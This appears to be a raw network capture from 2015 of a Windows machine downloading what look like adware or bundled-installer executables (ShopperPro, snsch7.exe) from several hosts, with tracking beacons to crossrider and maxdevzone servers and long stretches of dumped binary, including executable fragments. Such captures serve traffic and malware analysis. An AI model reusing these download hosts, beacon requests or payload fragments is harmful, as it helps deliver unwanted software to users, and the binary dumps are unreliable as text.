Age: 1
Content-Range: bytes 2500000-2707719/2707720
X-Cache: Hit from cloudfront
Via: 1.1 a95b55563304fbc5544e7dfbb15b0001.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pko1q5w9D-ZrV1f7lhkGzuvIYfTs_B6vuxhy-XYb5q-gC3-p0YarDg==
..D..F.1..-.M. h.F!....}.....T....a*.c..s.....3......:;.%>..\uC.].7
f.m.........<G...7X...^...IRK`........9...~.2..^`....TIIl..1...)o.&
lt;...J5J..fq}..V.....m....*.v}..e.w.*]Q. .|.W....'O&h....k.......i.'.
)rQ..G.}..D..w.cjK....s.b..q~.^..\0YR.w..-.......E...`....{..2..x.5m.7
....1.F..%`L.#....W?_j..4b.{t.............'..z..M@2Nhw..$.|0.6.h...!..
 ..._..&.G.Hd..O...(.. .z..&..Xg.u.......Sb"?....3=.@..{.....`..[..[.h
..I...s.#j...b.25kx|......%E.i...(....pxp....a*..`%kJ.=....\....P.u...
....2.y4#I..(.....B..]^)g..I...,...}2.u@@....g..vo.qI-..,.]....C....p.
 H^.)h/..O.........".4..*....1.9l..%.. ....%.?<.4."',|CN........e.^
R[.........{...uf.V...%.c]jK..`........d...e%..VzR..u.6....h...e9'....
.M....4.m....q....C'F..;[email protected].%.^k4.J...{t,}.ir.n.}.$.\....EB3nf.
%i.BT..os..fNA......O..............."......Y...g..j.'-....U.2.........
.sIc.:.....j..._.....~..~T....O.tQo...p.H...........9}..h..Qa.?...52..
,.'.?..P.;..[,.Cf'....Q$=..5...~........]L....j*.Q%y. [email protected]....
.n.e.n...k.y.4...3...,XyVH.........F....E..B.u.......s=...H.yE.w*F..C.
.p.|..|.&.X_..UU......I......`..h.]Wk.QN...o.?..Y'm.p.......XC..V....(
. n.C`?L*.>F..[F.....U2..`.........8....S.'8..e....68.-..Z..:bzP..s
.b....BY.`d.s.{[email protected]'c..p(y..c....{..T..v.-U..Vx.LI..:L
.Y Xj.......'.....,..^.*...HU..C..#.!.G.`.X.F.........U...._..........
..GJ*...j.........r.....6....`...h.Q$N.lue.k...v.`........-_.A.l), c.0
'[[email protected]?.o.v.=T)o.c....Qc..C...RM........L-.4&l
t;........u...J.t.U..(`..F0....k.GU.sy...u}k....r.9..x..;..f..g...
<<< skipped >>>


GET /utility.gif?report=fdata&f=3&c=803&i=10&n=ms_started&rnd=19871 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:21 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /utility.gif?report=fdata&f=3&c=1729&i=30&n=ms_download_success&rnd=25343 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:31 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /utility.gif?report=fdata&f=3&c=803&i=30&n=ms_download_success&rnd=25343 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:30 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /spdbt/shoppy/snsch7.exe HTTP/1.1
Range: bytes=0-249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dl.ourinputinfonet.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Thu, 13 Aug 2015 11:18:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439448710"
Last-Modified: Thu, 13 Aug 2015 06:51:50 GMT
Cache-Control: max-age=2163
Content-Length: 220160
Content-Range: bytes 0-220159/220160
Content-Type: application/x-msdownload
X-HW: 1439464705.dop001.am4.t,1439464704.cds037.am4.c
Content-Disposition: attachment; filename="snsch7.exe"
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1.S.u}=.u}=.
u}=.|...p}=.u}<.|}=.x/..t}=.x/..t}=.Richu}=........................
.PE..L...rt.T..................................... ....@..............
............0..............................................` ..<...
......................................................................
........... ..,............................text...[...................
........ ..`.rdata..n.... ......................@..@..................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U.........E........E
.....E..}.....}......k.....`......h......`...Pj.... @.j.h....j.j.j.h..
.@hR @.... @..E...., @..M..U.....U..N @..E.j.h....j.j.j.h......`...Q..
. @..E.j.j..U.R.E.P... @..E......E........M.....M..U.;U.}Mj..E.Pj..M.Q
.U.R... @..E.%....y.H...@.... @...U.3..U.j..E.Pj..M.Q.U.R... @....E.P.
.. @.j.j.... @.PhR @.j.j...$ @.j.... @.3...]..........................
......................................................................
..................................................................
<<< skipped >>>


GET /ShopperProJSFull.exe HTTP/1.1
Range: bytes=250000-499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 10:34:07 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2659
Content-Range: bytes 250000-499999/2707720
X-Cache: Hit from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: mAni8NjowoEZ4hzwNBBLLJMsnU9NKs3Qt2RVASXHdvqrrfOSDu6TIg==
...'@.......^..6.-..c......u,......#q......1w...^..1.G7;..F...V.8z...M
.._.o.*.........q....Z..Ey.$.?./4..y.X..*)ug.Xj...(.QZ.jB.HP.?F....s..
...4........0..w.x^......%"@.pv~.t.B.]...J..S..x-l.....Y?....][1=.8..D
a.......<......C...............BJ.&.D....9..x..R.5.,.|..n..0..!.v(.
.......[uA...-_..C..)....._5........)b...:.h.D?........3a...*.....I..@
.9 ....3qx..([email protected]@.
.....c....=...q......%.......T... |Z.....v.&..fQ).T3.L..'.of9.......[.
..".]$...1.5.w...9.p1.\ed..kG.oK.6..7..g...u........Kp..v....e....r...
...mJ..5&....o"o.%{....r.6..7T...U.-(i.........$.......T.....c......c.
.J.....@G.]...............cQN%....@.."L..U.sr.~.../....a.=.h4.S..br..q
>.9a....h..vx6.. ;znG<P[...pbo,..J).$..S{.#.v.S..0.!..iac9r$}B..
.!..Ls....*)........N...`.)<<wh.lkm(..B4..'........,.....g.P.$N 
.h<cZ........./7.....r.X.1K).@. dZ....Q0t*#..]..!...,.*............
.,.).2M...M.I.5..!..qj..O..g..:.....L....G... .`,...'.UpB..Ok..P.9.K.u
..Thk/.....J......wX........e..B.3....67]X...n(T|'r........*.U..~._...
c.>...3 jx..R.y..H.. G..,..)D.<.Y...&~..*Qw.t.H.R.k ..5....Gc.b.
J...z.f.@........>..V......e..c.S7...%...Q. ?[....].ad..........~E.
%MR..)!..j.Z...7....L..!/_.|..M.....o].}P..G..W..OO...yA..T..z.E......
.5.E2.B.q n7................../.L..e.l6...b...PA....l...Y.&.._rU9.~._-
.(7..i.Q...:..Yn...'....I.(4A]...sp4.O5.V.T..>.......%.n..J .fs.T..
..E.C2.W..2_...'...k..xc..C...H.....5......<.C.}.." o"f>..j.N..G
....v..oZ..B.y,.r..x.=.n..jb..M.....RP.U...3.#...P;.z..........>
<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1


Range: bytes=750000-999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 10:34:07 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 750000-999999/2707720
Age: 2661
X-Cache: Hit from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: pfKTDhlvaEezHBNdpLuQ1pjf0RS-1fa2LUz9JIrCztBi5MyXoX8osA==
.....'.......1....6W..).dc{K)...'=b.....sn.mMc...G.<!..y...W...u...
.......3 E....Ybd.....N.g.]E......m;..l :....1....0....0......u.D..v.C
l....q..2`.C... .x...j*.`......../...m...iH.93.P..iD`W...j..IF...?....
c..../.?.............;....B2.*1y..9.f.......U5]T..>'z&'....3.b.....
.,N.......:.....t.EUR..-i.b.'.t..(.&UW.E.v.....R..I.!~.e.u...s=\.].g8.
..4]..9~n....X....-%....30.....|...u....om.~z.sq*...t...7...@P4Y......
..i.)Su..... ......vz.P{......%.......^...........[....&.o.......iU..)
?..)4..lI........v.......#[email protected]\D..=2:.`_.E...Q....ES
.......Z.....P.z.r/.........6.."[email protected]^d..}.!.v...U(LB.8
...0q..cPf....X@.#.H..M\.z..S.U...[[..z....!...][email protected]
y.{o......h.g.r....... ...;...g.%......*q....!....~r.c...W...e........
U).`<D\.4j..P......-P)...FvT..D..'...N.....>H.6......).j..b@.(..
...JOH/..*....c..q.j.l w.p.c..{.L.h.g.eqd......$6...i.N..!9.~.G....Z..
..A...` .n..:<...(..Y).*/......oW../......E... .>R.Y.. 0n.-.B.A.
..I....}.......2......h..:.MB...J$..f..I....^..B.b.P.....L......m../.#
.".....Xx...t.:@1..R7...8F...kW.....r2.M...v....`.3...S..I......M..2..
x...g..`..y..R..UA..9k..nt...m...[.N. ....QP......:<.|0.i.(......B.
-."[email protected]&..@P.....]M..B.r....g..(...V.W3r.X1........l..
....&.F1..uo1.G...........X..2...#.....>...-.[......QS..S.*.......5
..Y.T....U......>xc.t.'W.-.H..'g=~..:.T.|.d..N..;....l,......t.t.r 
9.c.Le1G.5..&.......&.t..Fc]..x ukZ.KHH.T.,.ucj(...M........A._,&.....
S.9....]..2...3:F. [email protected].|R.%s....M6...n.*........t.X...cR
<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1


Range: bytes=1250000-1499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:28 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 1250000-1499999/2707720
X-Cache: Miss from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 6YRxe_E5uSwU6jigoh9_7Rgw7i8iS-0F_5YkJEcDFbAPBEZI1vvd8g==
P..yN...#X.Yx..7....0^..8.^....aA...l5...M......t.DR1I....(.>.P"...
o.Z..2.!..O%O..5=G..G...W..d........../.:[...d.KZb.p,P.......3J.G.....
..'..{9i!Y...#O.*.....]Q. ....lw.b.......Bd;..l..4....X,L....\dOtbb.F.
.>.w..RA0.Ey.WJ.{..GN.....2g..:..N.{...Z.........$b.?.#..~...i.....
PRj/Y.*jQ...>..Z...L&[..1>.g...'.YP(f.Q .....6~....@|.S6].#i..n.
8.jS..(.5.%....^B..T.O...$...T......|Y....;c:Fj.../.1p....!.'..E$r/.,}
.......$...Z[...c..b>.C..g?.....w.j\....%.....v$...9.-.)..t.q5[....
8..C1...}.q.....O$e.!.{.H....2..).}!.W....,..g.9......P6cz8o......q...
...........5.H. .....{...f....,.5...1.}...e.bG.W....B.......r.'...g6.;
....1.r.P.....;.jCi...[.8).....\(c.;;..Ch...Y.w.}..B.......|lt.{....D.
.!yYX. p..E.e%[email protected]!:..V*U. V..#.".G/..e....4 t..........Bj._...J....
.X.......5..T.b.).2h.......u......JV.".oE.n.....).`.l...%..W......Hp..
.j."..3...4....g{3..=...H..0NN%q.4a...4(...v.........~.s.<........G
.8hn...{.J.S.....!.z.6....k....D9..<*.x...K-a.....b.w.l.V.@%....3.U
h..Wi.<5..v].y...3i.}.e..8....L.nC...L...}...Sp?.!l.f....q1...._...
.N.>.$..N}..TPq.l..o....u...... }.....}./J.e52...........Y4'%m.5..*
|?..G.g.:.8P*....D.J.)....8W.9..}.7an..b...[}..l..7.Uy%.TGg..D#....c.x
|............k...zB^&;...V..Rja.1..'....Q../a..I....f..... .F.5.}%....
LD..f...'......S.W.!p.c.H.... 3 . .`.....qo.W...S..B..o.P...q?.Mr\....
..d...C.}tiY....7..9.c8\!....Y.a@...}....jH&/...E.hQ.........H.....>
;..ZN&......]..Z....qu...RR..t[.:5...8.g.*781{0/v...gq.... .....|j...-
..6_.s..j.......,...EG.....t...!.}..bcu.}..J......pP..I.}@bTS.>
<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1


Range: bytes=1500000-1749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:28 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Age: 1
Content-Range: bytes 1500000-1749999/2707720
X-Cache: Hit from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fM8-9_Zp-lMVZh-thqJ2AoewTKBr4ueYzwm1yM6fQNjqx2MIHW-bEQ==
AFA .9mM..F..z..`J....;.<kS....s:..kY..&C`.xnl.4a."..m...f.F..*3Rq.
U...$ZGx......a.S ....)_(..az...^.....9..w......k;......(...(.P]..e...
...H.p..l.`51M.i......3.iQ...i>..?..)...{.....n......r.[..j~..%.li.
.D.`.`0t......t..'J.:....J....-..2.\d..q..?..x...'U{.I.a.......0X.[Nr.
.Z/..U...U.m...W....ffs..cBk...:.?.....dv. &..c].m.S.... ..fKb:.IP`..M
V........8..7%'...7...... }K.......|.1.M......-.e.\.?...4...fq. ...|..
:..^...m..h..jnY>..1.>.........L...e..........:.7.X].w...'H.. ..
.......a....0.._QJa.-6.^..O}...4..b.Q......O.y.j..'.......4.{3....J` K
...j....m..z../..Ep;....:............`...Lb.^...#...T...u.$.c;?.......
<.#].L.r.$=~.....?...x.."......^x.t...Am.Y.......f......]......7*M.
........:....iG?m][email protected]'G.D..*..X...i...m.3.v.N..Z.G!..$:.....M..
|.....;.{..{.r...Q.;...p=8...'Ix!.W..V..),,..F..yQM.....c:......a`...Z
......R.....kz..t.....x..JM...v....T....-.{-. (p.9...*(.rw;.........1.
t.2.../$tZz...F.r.j*..,*Q.....y$./d..aU....Um...H4...R;.d.3.[..)S.....
...-kW..He..?..1..U.-...uh{.1..>X...........R.(......~. Z...n.3.YY.
...Q.....'2J.F./;fu.... ..l...S.._sM.8j..u..I.....^.<.TmN'b..Sa.~..
[email protected]=....5".'.ne.b!cQd..0..i.`.j....I.y..10m...|...uv?.m..!..._./.
..R}...\.......[..F.W..I..?......bQoz..<.HA.X./<.%......A....o-p
.......$k.l.....,P9..C\m.e-..$.y...R....0........4..A..?[.J.qR .......
}.C...;..*O.7=&..{q7.|[email protected][email protected].=.. ....
........wF...(......3U4a. W.Y............."ls9d.J. .)GuVv...:..*`.*".2
....Ae.".>..)..E.\..^.qU.j....5-...^Tl....8.. ..6..E>.....r.
<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1


Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:30 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 2000000-2249999/2707720
X-Cache: Miss from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ne48J9ysfGGXnlCnZHkqDxJWCJXb--qdfkpq8YScM4-g8AuZTiyweg==
...m7`...=3q.f...........v ./X..A.c.m.E....0.....8R..d.....h.l.....?..
PYN..T].{.<.eP.9.;.-.m..yUr..w.E./[email protected];....w*O............8
rl.B...O.S....e.<..!.x.>..m.}pK..i#.......ED..3....TX..T5...b=..
p ...S3W......$wgI..!&..C..H...l..8.* .......`..b". @*:}....g..}....{6
....I..4....`@...M...B..v|..7NR...BRM.....qG..<...:../*E...a.....XJ
..|........XDBV9.r.P....Q...~...N...........a..VT..O...a..H..'......`.
..i..@j.'.../.8..[.cP....(R[.~....8_.......[.......ncZ..S.=`.jr.....a.
...i.*Wn.c.X..=..e.... "......-U............>q...)W ..zKV.>....H
B.\....D...;......0......dd.....B..N..t..&...H..../WJpx!....ZZi..}qx..
s..RW%.t,#...........1NsI"F..WD..0..K..s [email protected]........:.......
.Mw.wB.......R.;....}...k..!.q.]..w4v`,....X....;k9.P...1...:..@?.. ..
 =.....6..4......U)...Lx..}[email protected].........".Qw..T...-.!....z.~.j0.K..
.F4..B;..._uv...O.D..X.ST.e...Z..2..pz8...:../V'.[B..g.s....:.9..Y....
T...z*.NU.....h.2,.r..5.........-.0...s.'.z.sR..W.....ayp.H..z....$t.M
.../.m?..W.|..3f@..[..@......!y.=.M....S...P.y....f.hHA....g#%..h#.u'.
!.....5...%Cz......*...."...|.N.\_...|.}[email protected]
...x.24C..8/.......4..~.i.c1..2...~.4..M..z....Q....Q.?....f.._.&..l..
.0...g..D.*9.%DY..co.e|V....[14...........Ku....t....z.@\D.3...W...I..
..[.L.B.Im.7MN.S.w...B...Gfpj.~.u..}W..8E.g..i..2]..6z..o..r5..ESs....
.....vk_... ..... [email protected]~..Br.G.....<.F .GaN...d..Z..:Q.{r-S|....
.M5..|"....S.U|[email protected]>.'.I.\...*<$.Z1.#-..)..V|...X..
[email protected].\...S*.&...Z*..-.....|/........A...|J.e..0....V.
<<< skipped >>>

GET /ShopperProJSFull.exe HTTP/1.1


Range: bytes=2250000-2499999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d2bt1dcmxj05l2.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Date: Thu, 13 Aug 2015 11:18:31 GMT
Last-Modified: Thu, 13 Aug 2015 09:23:24 GMT
ETag: "8eaa7e23e6aa005980487eb864dcaa53"
Accept-Ranges: bytes
Server: AmazonS3
Content-Range: bytes 2250000-2499999/2707720
X-Cache: Miss from cloudfront
Via: 1.1 d14fd6248e8744adca7a99428b205190.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bp2d0ni5N30PQ3U0WJzQTi9SsvPumVQ5QkVF8nQaMC5vZupHTJHFWg==
..\#[[..."....Z.....>!.P.f...Q..w...e.. .v*..z...f$.K....`0..D8.W.W
.pU#R.{"........s.....X....Z..R...x...x%...d..&...~3..y)2..(....&t.u..
....1.......Dx........*:......N..2..!fH..z....J...y..m0.......{..Q[.&l
t;......x....%|......6...... .|... ..6v [..Z.2....\........J..y{..W..8
.0S....Tm.68..7>..#.M&.j/.}.oWef"J....M...q.RN....v.......*.6J..l..
..Nt./.T....|4.}!..!.d'%..u..e.X....WIiW.[.6.Q.@Lc6.\Y..j.w.....%....j
h/...6./...IXn..?...=.w...gsE.S-.&nK.4..E...\_.1...J...!s....1..S..6RW
%8....Q.....p.]-P.8...a._.I../*.....3...`#C6..y&....:..BH....q0_...m.w
E.D.B.......zp9.g.....).;J.sb#.....".}...q..E.a.ht..Q...i\_.#..U.a9(..
..;..a}."<C@(..g`@..x6....C.n[....D.P( ..b......Z.....fi>...J.0.
.!.. .C.......H..*.........B.....E<M....e...H.FQ._w.!T.e..-;@.Q....
...< .x..Ku.....v..o$.........D...,^4ml..7....gU..rx....ii.eE..:.`c
c..8...9os...!o .)~a..G.Rl.iEd:...,[email protected]*.......Jfgr..%.|.....
#.r..>....\.-........p.............9(.....?f.D. ......2..|%.......?
{.`|h..G.]..Z...>...1.. .].3(...i.............d..*.2y..| [email protected]
.....k.{.gQe...N]X.-..h2....~..tt...l........d.03.....itX..j.. j..z..4
...6.....GW2._*G...N..`V-.sO.....6.z]..ad.%.........C...o#..(R..t.)...
..][.dS...q..%..cR.!.S..R-hkNG.....`zD....|..S..b...#.. .*..C...{Y..rM
......H.....jMGn..`.....4..6.].!fG5hX......}[email protected]....\].7.{...5
3..fH.]./F.....Vf.........v ....\m...A>....(.Z..n...i..Q.OI,.. .cI.
.Yh...N..TE....m......b.O.. ....z..<=$......l.Q.o..)j..y..&..X2.\,.
%..H]:...7...U...Z\A$...7.....Y...Zd..'..W..u.M..JcL......."wY...F
<<< skipped >>>


GET /15359.ashx?e=eFCD8T/coiezrE/yDXLQyd5jOExRmJjcfsQaZZXSd Q2fVsQFDtppP2TEkHeJNDUDPI5dGTWg7 SOxGOFR1rQ7/gCVcfJT7Zd/XCztdoPbJFiFlIaXxqEcmxw368usKjvx7ENkzRxOw/caEgn1aywgBPaL3foawtkjneDvF7aJsyFrdg9Bz4vxjVxaO/jmdPBGRotN0ABYeEjtD/tYznR 0LhpxXD4t4eCmOKii sWrz7yH4dpDjMWLUJGnTsXhlEK5u6pECdO1SxiNrRjAGZBB5aSy JFSFglNuW4n71dQey68r 4NN8VyKsbjLeBp4dMm3hqMstJ/y06twORtLg9fHR9A6p3upOM0S4XWXQNckrM9d9qKvEEB2Ep7ddBI2V0TFaJ4cExkLJWSC3b0K eCko9DIyNsADn6EXOLggZKypkVJN3kXvFA4InH5qGL6TgskKX3SgwYohnxsdae b8EiI8s6T8qHsyKop7n4S NokPwegfs5DA6y2ObHsF4aVuJuMr 09WnXl3jXxrL4WWiPc6F0Foo3zqD0Un5LpMl6Vac8KKMKQ dvxgza/aJvlagtVicvngwklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CaR2deZjme0S HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /spdbt/shoppy/snsch7.exe_c HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache



.Sz6..".@y.)..O%z..\...t5..*[email protected]\..
...cN.gn*U....'..o..L....i`./G..x.i;...D.r...0....O~.:...(.........O..
_.9C].....w...k....t.5..Q.\TD.n.ZX.......1F.Ah...R.?......#..xr.....?i
.)..h..o....O.N.."......A.*.m....Q.vZ.....~.|.&~...r.............2....
;..U.$.I.._%.0.~.o.....B|......?.3\..o...M....I6x4..vc. ......$.......
K..n..]K..U/...S)b..d?...q .....T.5..i..#g.g..C...(Y.CO0..4...F.\...#.
...I....M.y.h...k...].......!.i....[.....[..#s..\.lUej[s ..:.U.....M.`
..Hr4*..{2.....ji.b......w{...................l.......................
..Qw.c*v.&U..0..\....X..[.....o..\.?;.t..0 Xr.n.!...3.M..V..B...T....C
.T.UI...)%jt.W...u.....s...B=.T%..|%O..5.y...W]s..[E2.EJ....<1..]..
..U.JbS;.Z..w..ZNK#..c...l...c....y..oB..5..yo...\....K..a....Xi..9.$B
.........F|[?Zv.!. ..........Vq...O.f.,|.....pH.aW!......sfp..F..d.q..
.^a.cDA.p..q.`. ..W".)`.X.s.=W C.f ..........I...3..w....W......t.....
.d.EQ.Vsqf.dU0...x.]..z.g=C....H*%[email protected]...&...J.B..m.z...t...vE.
nPx.,......U[.N.....*...T5..f...r....^o..~..$........cpo........... L.
w.8......'.5...B.L......7.R.zL....~...>.X.@G-._W...?!..nU_..H.....Y
.K>.f..z...z...~%.....MA..;.4...7.f..R......p...E.......m7...p.....
.....Lh.-.r....@`E_9.;.....!W,..v{...}...<.J.U.Ve.=.~..8_|..Q.....I
....U..O...h.l.|..g.k...Z]...P...7..|................ .m..x.}..`.s.5,.
-PT.q..i8.>..9lp.!].....B....Io..P...j>..0....=..4...9;..%...}.8
?$|..s...&..!9..h.p....-...|.:k..h.$P!$.k...7 ...{._j.!..........E]...
.:[email protected]._...#.u-..}`A...A>u..q..j'..y.ex.m..r..o.........L.
<<< skipped >>>


GET /web/gf/all/setup.exe_e HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:25 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433380"
Last-Modified: Thu, 13 Aug 2015 02:36:20 GMT
Cache-Control: max-age=1267
Content-Length: 2124003
Content-Type: text/plain
X-HW: 1439464766.dop001.am4.t,1439464765.cds059.am4.c
1T....y!!X.......|..............XP..\X........./...8..-.%.09_.%.z..%f.
Z.f...E.@X*7'.V..R.9.....$.....5..=<.Z9g....~ ..... 7.O3v.....o..s.
...&\..[..... Rc..I...k*..D,..or)a>.1..T......V.M.>.WhK.u...w...
!3.w.2.....\"d.|...o..U.,[email protected].)..6P.;.]I.9.._......i.S.
a...{Sp...>.p. .# ....N.>,.A...!...*p.E..t..7ag40....s..n....P..
..b.......[%..P../)LY.P...Bm....8J...A......8$AJ.c".\....O^'.a`i!$.R.@
~u&..}....M.....[..S./"....ZH.......M...$...SW.D|.d^..6..........F....
.3...*m./.e.Tok.Dp../J..t.@<,....{.s2kG........~{..\.Tg{..A........
..Yw.%.......k...1<>...:.....g...#x.9.....*..4E..g....S..T..j.fu
K5.}..|.w.,..Q.e.m*........S.o...t..SrK......g..{.P.u.;.1...N........i
c,...IQp....uo.R...u.8jC]..';.m......Z..('..j...v.......C.......A.v9_.
......BFo.......MJT*...p.....P.H...M~..-..k.Y~-8.... 8..d..&`....0]..7
...;v9.Xl.......2i....w7........~_.z.."F.I........h..z...=...wx...pb`.
/..w..........YJ.dyE.....(..<....o....f.O..E..blA.X.....S.0)*....y%
..dL.....>kB.U.....g&..........Xkk"...^]....#.c..II-.vY....N.Q.....
.NK.'@..1.....{.ZU...........u..s\$.}.k......aL.eWw..W.xt..>..m7$[.
?.>..6...N;@....a...\>.7.{l4L.fA...b.i..8.I....S..,.....~.y.q...
.....m.8....r...l...^K.R....&0.E.J....k..ba.....E....#...........!x.Hy
 a.......o......kU..-..D.f..kd....2p`......i.VM.........2.....u..X.#..
.....e|G..2...........:Z[.)..._.s......ZnOW...W. #...%{@.W.H.e...c....
.Q.. ....d..r.1...o..... .~IM\.P......y.>.1....Gu Wsy.....Z,L..?...
....'.....................2..3.'...F.tHO....1.Aw.K......i....:Z...
<<< skipped >>>


GET /utility.gif?report=fdata&f=3&c=803&i=20&n=ms_start_download&rnd=16011 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:22 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: ng
inx/1.6.0..Date: Thu, 13 Aug 2015 11:19:22 GMT..Content-Type: image/gi
f..Content-Length: 43..Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT..C
onnection: close..GIF89a.............!.......,...........L..;..



GET /utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1439464835 HTTP/1.1
Host: errors.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: zFkE2G5dLXckit3dWVOUUPCrHtTTqx9SNfpDp9uFnqvMUqNdLXmthXBEayzgXzkI
x-amz-request-id: 6F05CAF9012E6CE7
Date: Thu, 13 Aug 2015 11:19:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Sun, 02 Aug 2015 12:57:10 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..



GET /t.ashx?e=QgW8pN5r26byj2QAAnEFBM30ehTmVX1mQBD1m2L769FXGmhmyGgv7qkO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFWLazpewXw1jXt7qcDfFhJwTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
